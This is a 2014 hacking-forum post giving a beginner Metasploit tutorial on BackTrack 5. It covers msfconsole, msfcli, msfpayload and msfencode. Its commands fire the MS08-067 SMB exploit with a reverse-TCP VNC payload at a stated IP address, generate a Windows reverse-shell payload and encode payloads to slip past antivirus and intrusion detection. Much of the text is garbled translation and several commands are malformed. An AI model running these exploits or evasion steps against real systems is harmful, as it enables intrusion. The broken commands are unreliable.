Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


Metasploit

  • 0 Vote(s) - 0 Average


10-03-2014, 02:32 AM #1
SickSpawn Offline You have an error in your SQL syntax; ***
TeaM MaDLeeTs
Posts:85 Threads:28 Joined:Sep 2014 Reputation: 2
Mood: Hacker
Msfconsole is an interface with most features of Metasploit . Msfconsle can be used to start the attacks , creating " listen - ers " , and many others. We will use throughout this tutorial Msfconsole .
Metasploit comes installed default on backtrack 5 . Msfconsole To access , deschde terminal and type:

Code:
root @ bt : ~ # cd / opt/metasploit/msf3
root @ bt :/ # msfconsole opt/metasploit/msf3

[Image: 274trHd.png?1?8581]

[Image: f6LfVfz.png?1]

If you need help to see the files " help" , simply write about help followed by the command you want to know more . In our case, we want to know more about the connect command . This allows us to communicate with a host.

Code:
msf > help connect

MSFcli

MSFcli is another way to access the Metasploit framework but focuses more on scripting and interpretability . To see more about msfcli :

Code:
root @ bt : ~ # cd / opt/metasploit/msf3
root @ bt :/ # msfcli opt/metasploit/msf3 -h

[Image: screenshot2ds.png]

Now let 's do a little " test drive" the msfcli . You can see the options in a way adding a letter at the end of the line. For example :

Code:
root @ bt :/ # msfcli windows/smb/ms08_067_netapt opt/metasploit/msf3 a

[img]http://i.imgur.com/oLivySI.png?1[/img ]

This module requires 3 options: RHOST , RPORT and SMPIPE . Adding P to end enables us to see what payloads can use.

Code:
root @ bt :/ # msfcli windows/smb/ms08_067_netapi opt/metasploit/msf3 RHOST = 184.22.212.191 P

[Image: dtdO1Y6.png?1]

We run our exploit selecting a payload , inserting options and coiling ' putting him to finish the letter E msfcli string argument .

Code:
root @ bt :/ # msfcli windows/smb/ms08_067_netapi opt/metasploit/msf3 RHOST = 184.22.212.191 PAYLOAD = windows / vncinject / reverse_tcp_dns E

Note : IP is selected as RHOST VPS running Windows Server. This system will react as victim for tests. You'll have to do the same with another computer or virtual machine . For " training " not upgrade the victim, or install a virus .

[Image: 5YuAcTs.png?1]

MSFpayload

Msfpayload component that generates a Metasploit shellcode and execute . Shellcode can be generated in several ways such as C , Ruby , JavaScript , and even Visual Basic. Each of these can be useful in different situations .

For help in msfpayload can write :

Code:
root @ bt ~ # msfpayload -h

[Image: jwSGmCm.png?1]

As msfcli , if you need to find the necessary options , put the end of the line point O.

Code:
root @ bt : ~ # msfpayload windows / shell_reverse_tcp O

MSFencode

The shellcode generated msfpayload is functional , but contains a lot of null characters which when interpreted by most of the programs , signify the end of a string , and this will cause the code to finish before compiling.

In addition, the cross shellcode network in cleartext that paote be picked intrusion detection systems ( Idss ) and antivirus programs . For this problem , developers msfencode Metasploit offers that will help you avoid caracacterele faulty and avoid antivirus and IDS initial payload encoding in a way that does not contain " " bad " characters " .

Code:
msfencode -h

for a list of options msfencode .

Metasploit contains a number of different encoding for different situations . Some will be useful CAN can use only alphanumeric characters as part of the payload , as if one file format or other applications which accept as input only printable characters . A very popular and well known encoder is x86/shikata_ga_nai .

For a list of available encoders writes ,

Code:
root @ bt : ~ # msfencode it

[Image: 2SdQIh3.png?1]
Source

[#] Twitter: sickspawnhy
[#] Jabber : [email protected]






Forum Jump:


Users browsing this thread:1 Guest(s)